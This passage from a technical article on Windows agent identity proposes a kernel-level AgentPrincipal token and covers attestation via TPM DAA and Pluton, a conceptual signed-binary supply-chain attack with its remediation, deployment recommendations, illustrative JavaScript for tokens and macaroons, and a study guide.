&lt;p&gt;The rule that does work for packaged parents -- and the cliff at the unpackaged boundary -- are both in Microsoft Learn for legacy-application AppContainer behaviour: &quot;When an unpackaged process running in an app container calls CreateProcess, the child process typically inherits the parent&apos;s token. That token includes the integrity level (IL) and app container info&quot; [@ms-learn-appcontainer-legacy]. For an MSIX-packaged parent like Microsoft Copilot for Windows, the kernel propagates the &lt;code&gt;TokenAppContainerSid&lt;/code&gt; and capability list to the child [@ms-learn-msix-container]. For an unpackaged Electron parent, the rule does not fire because there is nothing to propagate; even for the packaged parent, the package SID identifies the package, not an agent role. The semantics the article calls for -- &quot;this child is acting on behalf of the user, and the agent making that decision is X&quot; -- has no kernel-layer encoding today.&lt;/p&gt;
&lt;p&gt;A hypothetical &lt;code&gt;AgentPrincipal&lt;/code&gt;-preserving inheritance rule would extend the existing AppContainer rule. The pseudocode below is illustrative of an unshipped kernel routine; it cannot be executed.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;// PspAssignPrimaryTokenWithAgentInheritance (kernel-mode, called by
// NtCreateUserProcess via PspAllocateProcess for the SRM token path).

NTSTATUS PspAssignPrimaryTokenWithAgentInheritance(
    PEPROCESS  ChildProcess,
    PEPROCESS  ParentProcess,
    PTOKEN     ParentToken,
    PSECURITY_CAPABILITIES Caps,
    PIMAGE_SECTION_OBJECT  ChildImage)
{
    PTOKEN ChildToken;
    NTSTATUS s = SeSubProcessToken(ParentToken, &amp;amp;ChildToken);
    if (!NT_SUCCESS(s)) return s;

    // Existing rule (today&apos;s kernel): propagate AppContainer SID + caps
    // when the parent token is in an AppContainer.
    if (SeTokenIsAppContainer(ParentToken)) {
        SePropagateAppContainerSids(ParentToken, ChildToken);
    }

    // New rule: AgentPrincipal inheritance with refusal path.
    PTOKEN_AGENT_PRINCIPAL_INFORMATION AgentInfo =
        SeQueryAgentPrincipalInformation(ParentToken);
    if (AgentInfo != NULL) {
        // Child image must be Authenticode-signed and on the
        // AgentSID&apos;s per-tool allowlist authored at agent-install
        // time via the FIDO AATWG Pillar 1 ceremony.
        if (!SeImageIsAuthenticodeSigned(ChildImage) ||
            !SeAgentAllowlistContains(AgentInfo-&amp;gt;AgentSid,
                                      ChildImage-&amp;gt;SignerCertHash)) {
            ObDereferenceObject(ChildToken);
            return STATUS_AGENT_TOOL_NOT_ALLOWED;
        }
        SePropagateAgentPrincipal(AgentInfo, ChildToken);
        EtwWriteAgentChildProcessCreated(
            ParentProcess, ChildProcess, AgentInfo-&amp;gt;AgentSid);
    }
    return PsAssignPrimaryToken(ChildProcess, ChildToken);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The refusal path is the load-bearing part. Today, &lt;code&gt;CreateProcess&lt;/code&gt; from an agent process to any binary the user can execute succeeds. Under the proposed rule, the agent&apos;s per-tool allowlist is the access-check boundary: a child image not on the allowlist -- for example, an attacker-dropped &lt;code&gt;payload.exe&lt;/code&gt; masquerading as PowerShell -- is refused at the syscall layer, with the refusal landing in ETW as an &lt;code&gt;AgentToolDenied&lt;/code&gt; event correlated to the agent SID. Win32 App Isolation already ships an analogous inheritance-with-refusal shape for unpackaged Win32 binaries: the Application Capability Profiler produces a developer-supplied capability profile that the kernel enforces at child-process creation, with unprofiled syscalls failing the same way AppContainer fails capability-bounded calls today [@ms-learn-win32appiso-overview]. The missing piece for the agent case is the &lt;em&gt;agent&lt;/em&gt; dimension on the token, not the mechanism.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Even if Windows ships an &lt;code&gt;AgentPrincipal&lt;/code&gt;, every agent that shells out to PowerShell, Node, or Python today loses agent-attribution at the child-process boundary, because non-packaged children inherit the user&apos;s primary token unmodified. Agent vendors should assume that &quot;shell out to a language runtime&quot; is the default attack path; readers writing agent tools should keep operations inside the agent process where possible.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.3 Revocation latency&lt;/h3&gt;
&lt;p&gt;Revoking an agent&apos;s Entra Agent ID in the cloud should fan out to a Kerberos TGT purge plus local token-cache invalidation plus a WAM cache flush, without logging the user out. The plumbing does not exist on Windows. Continuous Access Evaluation is the closest cloud-side analog -- it can short-circuit access-token reuse against a remote API on the cloud side, but it cannot reach the user&apos;s local Kerberos cache or the user&apos;s local DPAPI scope.&lt;/p&gt;
&lt;h3&gt;9.4 MCP authorisation alignment&lt;/h3&gt;
&lt;p&gt;Every MCP server today runs its own OAuth 2.1 plus RFC 9728 PRM dance [@anthropic-mcp-2025-11-25]. The OS-side agent principal has no role; per-tool authorisation lives above the OS and is invisible to ETW and Defender. An MCP-aware &lt;code&gt;AgentPrincipal&lt;/code&gt; would let the OS surface the per-tool grant chain as part of the access-check audit record, so EDR can correlate an MCP grant to a downstream syscall.&lt;/p&gt;
&lt;h3&gt;9.5 DAA-for-agent-class deployment: end-to-end&lt;/h3&gt;
&lt;p&gt;TPM 2.0 Direct Anonymous Attestation can, in principle, prove &quot;this binary is &lt;em&gt;some&lt;/em&gt; Claude Desktop&quot; without identifying the specific instance. As of May 2026 no agent vendor uses DAA as an attestation issuer for itself; the deployment glue between Pluton, Azure Attestation Service, and an AATWG Pillar 2 verifier does not exist. The cryptographic substrate is in the TPM; the deployment pipeline that would carry it is not. Working the chain end-to-end clarifies what would have to ship.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Leg 1: the agent vendor as DAA issuer.&lt;/strong&gt; Anthropic, Microsoft, or Cursor plays the role of &lt;em&gt;DAA Issuer&lt;/em&gt; in the canonical three-entity formulation: &quot;The entities are the DAA Member (TPM platform or EPID-enabled microprocessor), the DAA Issuer and the DAA Verifier. The issuer is charged to verify the TPM platform during the Join step and to issue DAA credential to the platform&quot; [@wiki-daa]. The vendor maintains a long-term issuer key pair; the public half is the basename a verifier consults. Discovery is conventionally JSON Web Key Set under OpenID Connect Discovery 1.0, the same mechanism Azure Attestation Service itself exposes for relying parties [@ms-learn-aas-concepts]. No agent vendor publishes such an endpoint today.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Leg 2: the Join step at first run.&lt;/strong&gt; On first agent launch, a Windows-side broker (a proposed extension to WAM) mediates the Join with the vendor&apos;s issuer endpoint. Conceptually, the local Pluton or TPM runs &lt;code&gt;TPM2_CreatePrimary(hierarchy = TPM_RH_ENDORSEMENT, inPublic.type = TPM_ALG_ECDAA, ...)&lt;/code&gt; to mint the member key, then &lt;code&gt;TPM2_Commit&lt;/code&gt; to produce the ECDAA ephemeral commitments. The vendor issues an ECDAA membership credential -- not a per-device cert; the credential is unlinkable across signatures by construction -- and Pluton stores it in non-volatile memory [@ms-learn-pluton-tpm]. The user&apos;s WebAuthn-bound consent (the Pillar 1 evidence) is recorded in the vendor&apos;s audit log. The WAM broker has no agent-scoped DAA Join extension as of May 2026.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Leg 3: the Sign step on each agent action.&lt;/strong&gt; Per-action, Pluton runs &lt;code&gt;TPM2_Commit&lt;/code&gt; with the verifier&apos;s nonce, then &lt;code&gt;TPM2_Sign(daaMemberKey, message_digest, scheme = TPM_ALG_ECDAA)&lt;/code&gt;. The WAM broker bundles the ECDAA signature into an Azure-Attestation-Service-style JWT envelope and submits it to the AATWG Pillar 2 verifier endpoint [@ms-learn-aas-overview; @ms-learn-aas-concepts]. The verifier de-serialises the JWT, runs the four-step check from Problem 6 (Authenticode chain plus Pluton EK chain plus measured-boot PCRs plus application-load PCR) plus the ECDAA verification. The verifier learns &quot;some Anthropic Claude Desktop is making this request&quot; but not &lt;em&gt;which&lt;/em&gt; device; two consecutive actions from the same agent on the same device are cryptographically indistinguishable from two actions on different devices. The Azure Attestation Service policy engine does not carry an &quot;agent-class membership&quot; claim type that downstream Conditional Access can consume as a signal today.&lt;/p&gt;
&lt;p&gt;The deployment gap, taken together, is integration rather than algorithm. Every primitive exists in the TCG TPM 2.0 specification, in the Azure Attestation Service engine, and in the WAM broker. Nobody has glued vendor-issuer plus Pluton-member plus WAM-broker plus AAS-verifier into a shipping pipeline. The corpus&apos;s sibling DAA article carries the verbatim TCG protocol detail; this section anchors the deployment chain to the Windows-side primitives Microsoft documents.&lt;/p&gt;
&lt;h3&gt;9.6 Signed-binary harvesting: a worked example&lt;/h3&gt;
&lt;p&gt;An attacker who steals a legitimately signed agent binary inherits any &lt;code&gt;AgentPrincipal&lt;/code&gt; that would otherwise be granted to that binary -- unless attestation is bound to runtime state, which DAA alone cannot provide. The attack is the Stuxnet-class supply-chain pattern, generalised to the agent case.&lt;/p&gt;
&lt;p&gt;The attacker compromises Anthropic&apos;s signing infrastructure -- the private-key custodian for the EV code-signing certificate, or the build pipeline that calls the custodian. The historical precedent for this exact attack shape is the 2010 Stuxnet incident, in which two distinct Authenticode driver-signing certificates were exfiltrated from JMicron Technology Corp and Realtek Semiconductor Corp (both VeriSign-issued) and used to produce kernel drivers Windows accepted as legitimate [@wiki-stuxnet]. The attacker now produces &lt;code&gt;claude-desktop-evil.exe&lt;/code&gt; with the Anthropic Subject Name signed by the legitimate private key; &lt;code&gt;wintrust.dll!WinVerifyTrust&lt;/code&gt; returns &lt;code&gt;S_OK&lt;/code&gt;. To every existing Authenticode consumer -- App Control for Business publisher rules, AppLocker publisher conditions, Defender signer-based exclusions -- the malicious binary is indistinguishable from the legitimate Claude Desktop. If a hypothetical &lt;code&gt;AgentPrincipal&lt;/code&gt; is bound to the install-time Authenticode signature alone, Windows mints the same &lt;code&gt;AgentSid&lt;/code&gt; for the malicious binary; the audit trail still reads &quot;Claude Desktop did X&quot; because the binary cryptographically &lt;em&gt;is&lt;/em&gt; Claude Desktop as far as the load-time check can tell.&lt;/p&gt;
&lt;p&gt;The remediation runs through Pluton&apos;s measured-boot chain plus Azure Attestation Service. Microsoft Pluton &quot;provides hardware-based root of trust, secure identity, secure attestation, and cryptographic services&quot; [@ms-learn-pluton]; secure attestation is exactly the role this attack requires. Pluton-rooted attestation is a TPM 2.0 &lt;code&gt;TPM2_Quote&lt;/code&gt; over a selected set of Platform Configuration Registers signed by an Attestation Identity Key whose endorsement chain terminates at Pluton&apos;s manufacturer-burned Endorsement Key [@ms-learn-pluton-tpm]. The PCRs that matter for distinguishing the legitimate Claude Desktop from &lt;code&gt;claude-desktop-evil.exe&lt;/code&gt; are PCRs 0 through 7 (UEFI firmware, Option ROMs, boot manager, Secure Boot policy -- the pre-OS measured-boot range per the TCG PC Client Platform Firmware Profile), PCR 11 (BitLocker and the OS loader application code path, into which ELAM and kernel-mode driver measurements extend on Windows), and an application-extend PCR (PCR 12 in many shipping configurations, sometimes a virtual PCR via the TPM Base Services or VBS) carrying the SHA-256 of the on-disk agent image plus the cumulative hash of in-process module loads. The wire format the verifier evaluates is the Azure-Attestation-Service JWT envelope [@ms-learn-aas-overview; @ms-learn-aas-concepts].&lt;/p&gt;
&lt;p&gt;The AATWG Pillar 2 verifier performs four cascaded checks in order. (1) Authenticode chain valid -- the agent binary&apos;s image hash is covered by an Authenticode signature whose chain terminates in a trusted root; this is the only check today. (2) Pluton EK chain valid -- the AAS-issued JWT was signed by an AIK whose endorsement chain terminates at a Microsoft-issued Pluton EK certificate, proving the quote came from real hardware. (3) Measured-boot PCRs in known-good set -- PCRs 0 through 11 match a reference value for the user&apos;s claimed device class and OS build (Windows 11 24H2, Secure Boot on, VBS on). (4) Application-load PCR matches the published-by-vendor measurement -- PCR 12 matches the hash the agent vendor published in a verifier-discoverable channel for the legitimate release. Step (4) is the runtime-state binding. The attacker now needs either to compromise the vendor&apos;s published-hashes channel &lt;em&gt;in addition to&lt;/em&gt; the signing key, or to compromise the user&apos;s Pluton-rooted measured-boot chain &lt;em&gt;in addition to&lt;/em&gt; the signing key. Both are strictly stronger compromises; both raise the attacker&apos;s cost by a hardware-vs-software factor. No agent vendor publishes the application-load-PCR reference channel today; the AATWG Pillar 2 verifier reference implementation does not exist.&lt;/p&gt;
&lt;h3&gt;9.7 Agent-identity benchmark gap&lt;/h3&gt;
&lt;p&gt;No published peer-reviewed benchmark suite compares the cloud, OS, and broker positions on a common agent-attribution workload as of May 2026. The closest available empirical results are vendor-internal: AP2 v0.2 demo measurements published with the September 2025 cloud.google.com launch and the subsequent ap2-protocol.org release notes [@ap2-cloud-blog; @ap2-protocol]; Microsoft Build 2025 session telemetry for WAM Token Protection latency [@ms-learn-wam]; RFC 8693 OAuth Token Exchange implementations measured in IEEE / ACM / USENIX venues since 2019 [@ietf-rfc-8693] but in non-agent configurations. None of these is a comparison; all are baselines.&lt;/p&gt;
&lt;p&gt;The absence matters at two levels. Practitioners deploying an agent stack in 2026 cannot make principled latency, scale, or audit-completeness tradeoffs across the seven methods catalogued in Section 7 without a shared harness; a cloud-managed enterprise running Entra Agent ID plus RFC 8693 plus MCP cannot compare its per-action token-mint latency against a competing WAM-extended deployment without rerunning both stacks under the same workload. At the literature level, the field has named its primitives, sketched its composition rules, and assembled its wire formats but has not yet produced shared evaluation workloads.&lt;/p&gt;
&lt;p&gt;A public AATWG-blessed benchmark would have to measure four axes matching the four distinct architectural moves the article catalogues: per-action token-mint latency from agent decision to capability-token presentation; ETW event volume per agent action and per agent session; attestation chain length (Pluton AIK to AAS JWT to vendor ECDAA to relying-party verify) in the Pillar 2 path; and cross-process-delegation propagation success rate (the §9.2 property -- the fraction of agent-spawned child processes that retain agent attribution end-to-end). The four axes are necessary because the seven methods make incomparable tradeoffs across them, and the only honest cross-method statement today is the negative one: no shared benchmark exists.&lt;/p&gt;
&lt;h2&gt;10. What to ship today&lt;/h2&gt;
&lt;p&gt;Six things a Windows engineer or agent vendor can do in May 2026 using only primitives that already ship.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ship the agent as an MSIX-packaged app to get a stable package SID.&lt;/strong&gt; The package SID is not an agent principal, but it is the only kernel-level identifier you can rely on today [@ms-learn-appcontainer; @ms-learn-appcontainer-legacy]. Packaging is the precondition for per-package DPAPI scope, capability-gated network egress under Windows Filtering Platform, and any future &lt;code&gt;AgentPrincipal&lt;/code&gt; retrofit -- a non-packaged Electron app gets none of these.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mint agent-scoped tokens from Entra Agent ID&lt;/strong&gt; rather than letting the agent act under the user&apos;s delegated token [@ms-learn-agentid; @ms-learn-agentoauth]. You get Conditional Access on the agent identity, Purview agent-interaction audit fields, and a sign-in log entry distinct from the user&apos;s. Available grant types are &lt;code&gt;client_credentials&lt;/code&gt;, &lt;code&gt;jwt-bearer&lt;/code&gt;, and &lt;code&gt;refresh_token&lt;/code&gt;; interactive flows are not supported for agent entities [@ms-learn-agentobo].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Use Kerberos Resource-Based Constrained Delegation rather than unconstrained delegation.&lt;/strong&gt; Scope the allowed-to-delegate-to list to the specific back-end services the agent legitimately calls [@ms-learn-mssfu]. RBCD inverts the authoring point: the back-end resource names the front-end services it accepts delegation from, which is the right authoring point when the agent population changes faster than the back-end population.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Route agent tool invocations through an MCP server with the 2025-11-25 OAuth 2.1 plus RFC 9728 PRM authorisation profile enabled&lt;/strong&gt; [@anthropic-mcp-2025-11-25; @ietf-rfc-9728; @ietf-oauth-v2-1]. Do not rely on the user&apos;s logon credentials at the tool layer. Each tool grant is then explicit, scoped, and revocable independently of the user&apos;s session.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The cost of MSIX packaging is paid once, at install-time, and the cost of leaving the Electron user-DPAPI scope alone is paid forever. Every future agent-attribution retrofit -- per-package DPAPI scope, capability-gated network egress, an &lt;code&gt;AgentPrincipal&lt;/code&gt; token field -- depends on the package SID being there to attach to. Pay the install-time cost.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Treat every locally stored agent secret as a user-DPAPI-scope liability for Electron-wrapped agents.&lt;/strong&gt; Any other process under the same user can decrypt it. If isolation matters, store the secret in a Virtualisation-Based Security trustlet behind Credential Guard, in an AppContainer per-package DPAPI scope, or in a Pluton-backed key. The substrate exists; the decision is whether to use it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Subscribe to the FIDO Alliance AATWG and Payments TWG mailing lists&lt;/strong&gt; [@fido-aatwg-pr; @fido-aatwg-landing]. Wire formats are in flight; deployment characteristics will not be settled until at least H2 2026. The mailing-list traffic is the cheapest signal you can get on what the agent-protocol wire format will look like in 2027.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;

Open an elevated PowerShell prompt and run `whoami /all`. You will see the primary user SID, the group SIDs, the integrity-level overlay, and the enabled privileges that your shell process is currently running with -- the exact data structure the kernel reads on every `SeAccessCheck` call.&lt;p&gt;If you have an MSIX-packaged AppContainer process available (the Microsoft Store apps are the easiest source), run &lt;code&gt;Get-AppxPackage | Select Name, PackageFamilyName, SignatureKind&lt;/code&gt; and then &lt;code&gt;Get-AppxPackage &amp;lt;Name&amp;gt; | Get-AppxPackageManifest&lt;/code&gt; to see the capability list. The capability SIDs that show up in the manifest are the per-resource gates that AppContainer adds on top of the package SID. There is, today, no analogous &lt;code&gt;whoami /agent&lt;/code&gt; command. That absence is the gap.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The first RunnableCode block gives a hands-on feel for the shape of a primary token&apos;s principal set and what the proposed &lt;code&gt;AgentPrincipal&lt;/code&gt; would add. The second demonstrates macaroon attenuation so the chained-HMAC construction stops being abstract.&lt;/p&gt;
&lt;p&gt;{`
// Conceptual model of a Windows access token, as whoami /all would print it.
// On a non-AppContainer process today there are user/group SIDs but no
// package SID and no proposed AgentPrincipalSid.
const tokenToday = {
  primaryUserSid: &apos;S-1-5-21-3623811015-3361044348-30300820-1013&apos;,
  groupSids: [
    &apos;S-1-5-21-3623811015-3361044348-30300820-513&apos;, // Domain Users
    &apos;S-1-5-32-545&apos;,                                // BUILTIN\\Users
    &apos;S-1-5-11&apos;,                                    // Authenticated Users
  ],
  packageSid: null,        // not in an AppContainer
  agentPrincipalSid: null, // proposed in this article; not in any shipping build
  integrityLevel: &apos;Medium&apos;,
};&lt;/p&gt;
&lt;p&gt;// Same agent process under the proposed seventh-generation token shape.
const tokenWithAgentPrincipal = Object.assign({}, tokenToday, {
  packageSid: &apos;S-1-15-2-2756086904-3023256918-1882200006-3954548928-2786400166-3567463568-3801030027&apos;,
  agentPrincipalSid: &apos;S-1-15-7-1001-AGENT-CLAUDE-DESKTOP&apos;,
  integrityLevel: &apos;Low&apos;,
});&lt;/p&gt;
&lt;p&gt;function summarise(label, t) {
  console.log(&apos;--- &apos; + label + &apos; ---&apos;);
  console.log(&apos;Primary user SID: &apos; + t.primaryUserSid);
  console.log(&apos;Package SID:      &apos; + (t.packageSid || &apos;(none)&apos;));
  console.log(&apos;Agent SID:        &apos; + (t.agentPrincipalSid || &apos;(none)&apos;));
  console.log(&apos;Integrity:        &apos; + t.integrityLevel);
}&lt;/p&gt;
&lt;p&gt;summarise(&apos;Token today (Electron Claude Desktop under user logon)&apos;, tokenToday);
summarise(&apos;Token after the seventh generation&apos;, tokenWithAgentPrincipal);
`}&lt;/p&gt;
&lt;p&gt;{`
// Conceptual macaroon: each caveat is bound by a fresh HMAC over the prior
// HMAC plus the caveat text. The holder can only attenuate; never expand.
const crypto = {
  hmac(key, msg) {
    // Toy mixing function, not cryptographic. Real macaroons use HMAC-SHA256.
    let h = 2166136261;
    const data = String(key) + &apos;|&apos; + String(msg);
    for (let i = 0; i &amp;lt; data.length; i++) {
      h = Math.imul(h ^ data.charCodeAt(i), 16777619);
    }
    return (&apos;00000000&apos; + (h &amp;gt;&amp;gt;&amp;gt; 0).toString(16)).slice(-8);
  },
};&lt;/p&gt;
&lt;p&gt;function mint(rootKey, identifier) {
  const sig = crypto.hmac(rootKey, identifier);
  return { id: identifier, caveats: [], sig };
}&lt;/p&gt;
&lt;p&gt;function attenuate(macaroon, caveat) {
  const nextSig = crypto.hmac(macaroon.sig, caveat);
  return {
    id: macaroon.id,
    caveats: macaroon.caveats.concat([caveat]),
    sig: nextSig,
  };
}&lt;/p&gt;
&lt;p&gt;function verify(rootKey, macaroon) {
  let sig = crypto.hmac(rootKey, macaroon.id);
  for (const c of macaroon.caveats) {
    sig = crypto.hmac(sig, c);
  }
  return sig === macaroon.sig;
}&lt;/p&gt;
&lt;p&gt;const ROOT = &apos;agent-issuer-root-secret-123&apos;;
const m0 = mint(ROOT, &apos;agent-claude-desktop-session-42&apos;);
const m1 = attenuate(m0, &apos;tool = filesystem.read&apos;);
const m2 = attenuate(m1, &apos;path-prefix = C:\\Users\\parag\\projects&apos;);
const m3 = attenuate(m2, &apos;expires-at = 2026-05-25T15:00:00Z&apos;);&lt;/p&gt;
&lt;p&gt;console.log(&apos;Base verified:       &apos; + verify(ROOT, m0));
console.log(&apos;Three-caveat chain:  &apos; + verify(ROOT, m3));&lt;/p&gt;
&lt;p&gt;// Holder cannot un-attenuate. A holder who tries to drop a caveat would
// have to compute the prior signature, which requires the issuer&apos;s secret.
const tampered = { id: m3.id, caveats: m3.caveats.slice(0, 2), sig: m3.sig };
console.log(&apos;Tampered (verify):   &apos; + verify(ROOT, tampered));
`}&lt;/p&gt;
&lt;p&gt;Six things you can do today; eight misconceptions you can stop carrying.&lt;/p&gt;
&lt;h2&gt;11. Misconceptions and practical concerns&lt;/h2&gt;

Entra Agent ID solves the cloud-side half. It gives an agent a directory entry, a sign-in log, a Conditional Access surface, and a token-exchange path under `client_credentials`, `jwt-bearer`, and `refresh_token` grants [@ms-learn-agentid; @ms-learn-agentoauth]. What it does not do is reach inside the operating system. A locally-installed agent with an Entra Agent ID still calls the Windows file-system API under the user&apos;s primary token, decrypts user-DPAPI blobs as the user, and impersonates over RPC as the user. The OS-side attribution stays collapsed even when the cloud-side attribution is clean. Both layers are necessary; neither is sufficient.

The Microsoft On-Behalf-Of flow [@ms-learn-obo-flow] and RFC 8693 Token Exchange [@ietf-rfc-8693] solve the *back-end-to-back-end* delegation problem: a web API can call another web API as the user. They do not address desktop attribution. When the user&apos;s Microsoft 365 Copilot client (running on the user&apos;s desktop as the user) calls a downstream API, the cloud-side token carries the actor claims; the desktop-side process still runs under the user&apos;s primary token, and the OS-side audit trail still records the user as the syscall principal. OBO is the cloud answer to a different question.

The package SID is part of the agent attribution story, but it does not by itself constitute agent attribution. The verbatim Microsoft Learn rule is that &quot;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-appcontainer]. That gives the access-check a way to restrict the package&apos;s authority below the user&apos;s; it does not give downstream consumers a way to distinguish &quot;this package is an AI agent acting on a separable principal&quot; from &quot;this package is a UWP weather app.&quot; Treating the package SID as the agent principal also fails at the boundary every Electron-wrapped agent crosses today: those agents are not packaged, so they do not get a package SID at all.

NT 3.1 solved *user* attribution. The primary token model, the user SID structure, impersonation, `SeAccessCheck` -- all of these are about distinguishing one user from another and about a thread temporarily speaking as a different identity [@ms-learn-sids]. None of them solved *code* identity (which took until 1996 with Authenticode and was still being refined in 2017 with App Control for Business) and none of them solved *agent* identity (the open problem this article is about). The article must not conflate the three. The 1993 milestone is the foundation; it is also incomplete by design for the question that arrived in 2025.

Putting the agent in AppContainer gets you a package SID, a per-package DPAPI scope, capability-gated network egress, and a LowBox token; do this regardless of whether you call it an agent. What AppContainer does not give you is a kernel-level signal that distinguishes agent semantics from app semantics. Defender, ETW, and Conditional Access read package SIDs as package identifiers, not as agent role markers. A full agent-principal answer needs both the AppContainer-style sandbox and a sibling-principal SID that downstream consumers explicitly understand to be an agent identity, separately governed and separately revocable.

Administrator Protection is the existence proof that Windows can mint a second logon-session principal for a bounded action under a Hello user-verification gesture. As of May 2026 it is in Insider preview, not generally available; the feature surfaced on Insider builds in late 2025 and subsequent Insider build iterations have continued through 2026 [@ms-techcomm-adminprot]. The architectural pattern -- separate logon session, Hello gesture, scoped to one action -- is exactly the shape the seventh-generation agent principal would take. What it does not do today is generalise to delegation. The System-Managed Administrator Account is scoped to elevation. The agent-principal version would be scoped to &quot;this agent for the duration of this delegated session&quot;; the policy machinery does not yet exist.

No. Macaroons attenuate offline: the holder appends a caveat and a fresh HMAC, derives a strictly weaker macaroon, and presents it; the verifier walks the chain. OAuth bearer tokens cannot attenuate without round-tripping the authorisation server, which makes them structurally unfit for an agent that talks to many tools with many different scope shapes [@macaroons-ndss; @macaroons-gr]. See §7.3 for the worked construction.

The Windows framing is specific because the article is specifically about Windows. The underlying problem is platform-general. iOS App Attest (`DCAppAttestService`) and the Android per-app UID model are the cross-platform analogs of an OS-level application principal; neither has a published agent-identity story as of May 2026. macOS has its own per-app code-signing and entitlement substrate; it also has no shipping agent-principal model. Linux distributions vary. The fact that Windows ships the AppContainer dual-principal substrate already, plus the Administrator Protection bounded-second-principal existence proof, plus the Pluton-rooted attestation chain, makes Windows the operating system where the seventh-generation answer is most legibly close. It is not a Windows-only problem; it is a problem where Windows is unusually well-equipped to solve it next.
&lt;p&gt;The position the article ends on is the one each prior section pushed toward. As of May 2026 the cloud-identity layer has crossed the agentic-identity gap. The OS layer has not. The substrate primitives are largely in place: AppContainer package SIDs and the LowBox token, Kerberos S4U2Self and S4U2Proxy, WAM with TPM-bound refresh tokens, WebAuthn and Windows Hello with TPM-rooted user verification, TPM 2.0 Direct Anonymous Attestation, the Administrator-Protection separate-logon-session pattern, ETW as an audit channel. The missing piece is a kernel-recognised &lt;code&gt;AgentPrincipal&lt;/code&gt; extended from the package-SID substrate, gated by Hello-mediated Verifiable User Instructions, scoped via a macaroon-style per-tool capability layer, audited via an ETW &lt;code&gt;SubjectAgentSid&lt;/code&gt; field, and revocable via a CAE-style fan-out that does not require logging the user out. The MSRC servicing criteria document is the governance object that determines whether the seventh generation is a defensible security boundary or a defense-in-depth feature; that document has not been amended.&lt;/p&gt;
&lt;p&gt;The question is when, not whether, Windows ships the seventh generation.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;agentic-identity-on-windows-when-the-process-acting-on-your-behalf-isnt-you&quot; keyTerms={[
  { term: &quot;Primary token&quot;, definition: &quot;The kernel-resident access token attached to every Windows process at creation; carries the user SID, group SIDs, an integrity-level SID in a SYSTEM_MANDATORY_LABEL_ACE inside the token&apos;s SACL, and a privilege set.&quot; },
  { term: &quot;SID&quot;, definition: &quot;Security Identifier; the variable-length structure that uniquely identifies a security principal in a Windows access decision.&quot; },
  { term: &quot;AppContainer&quot;, definition: &quot;The kernel sandbox shipped in Windows 8 (October 26, 2012); attaches an S-1-15-2 package SID to the access token and gates access through the intersection of user and package authority.&quot; },
  { term: &quot;S4U2Self / S4U2Proxy&quot;, definition: &quot;Microsoft&apos;s Kerberos Protocol Extensions that let a server obtain a service ticket on behalf of a user without that user&apos;s password; the act-on-behalf-of primitive on Windows.&quot; },
  { term: &quot;Confused Deputy&quot;, definition: &quot;Hardy 1988: a process holding authority from multiple sources cannot express which authority it is exercising for a given action; the structural lower bound on agent attribution.&quot; },
  { term: &quot;Macaroon&quot;, definition: &quot;A bearer credential constructed as a chained HMAC over caveats; any holder can derive a strictly weaker credential by appending a caveat without round-tripping the issuer.&quot; },
  { term: &quot;DAA&quot;, definition: &quot;Direct Anonymous Attestation; a TPM 2.0 protocol that lets a device prove membership in a privacy-preserving group without revealing the specific device identity.&quot; },
  { term: &quot;WAM&quot;, definition: &quot;Web Account Manager; the on-device OAuth token broker that ships with Windows and binds refresh tokens to the TPM.&quot; },
  { term: &quot;Administrator Protection&quot;, definition: &quot;The Windows 11 Insider feature (late 2025 onwards, not yet GA) that mints a separate logon session under a System-Managed Administrator Account for an elevation, gated by a Windows Hello gesture.&quot; },
  { term: &quot;AATWG&quot;, definition: &quot;FIDO Alliance Agentic Authentication Technical Working Group; launched April 28, 2026 with three pillars: Verifiable User Instructions, Agent Authentication, Trusted Delegation for Commerce.&quot; }
]} questions={[
  { q: &quot;What is the primary structural reason a locally-installed AI agent on Windows in 2026 cannot be attributed separately from the logged-on user?&quot;, a: &quot;Every process on Windows carries one primary token; the token&apos;s user SID is the runtime principal; the agent process inherits the user&apos;s primary token; SeAccessCheck, ETW, RPC ACLs, Defender, and on-device Conditional Access all read the user SID as the principal.&quot; },
  { q: &quot;Name the six shipped generations of Windows app identity and the generation that has not yet shipped.&quot;, a: &quot;Gen 1 NT 3.1 primary token (1993); Gen 2 Authenticode (1996); Gen 3 SRP then AppLocker (2001, 2009); Gen 4 AppContainer + package SID (2012); Gen 5 App Control for Business (2017+); Gen 6 Administrator Protection (late 2025 Insider, not yet GA); Gen 7 AgentPrincipal (missing).&quot; },
  { q: &quot;Why does the AppContainer package SID not, by itself, constitute an agent principal?&quot;, a: &quot;The package SID identifies a package, not an agent role; downstream consumers cannot distinguish &apos;this package SID is an AI agent on a separable principal&apos; from &apos;this package SID is a UWP calculator&apos;; Electron-wrapped agents do not get a package SID at all.&quot; },
  { q: &quot;What are the three pillars of the FIDO AATWG and what wire-format primitive does each carry?&quot;, a: &quot;Pillar 1 Verifiable User Instructions: passkey-signed delegation token bound to a specific intent with short TTL. Pillar 2 Agent Authentication: attestation plus identity assertion. Pillar 3 Trusted Delegation for Commerce: AP2 mandate or Verifiable Intent SD-JWT chain.&quot; },
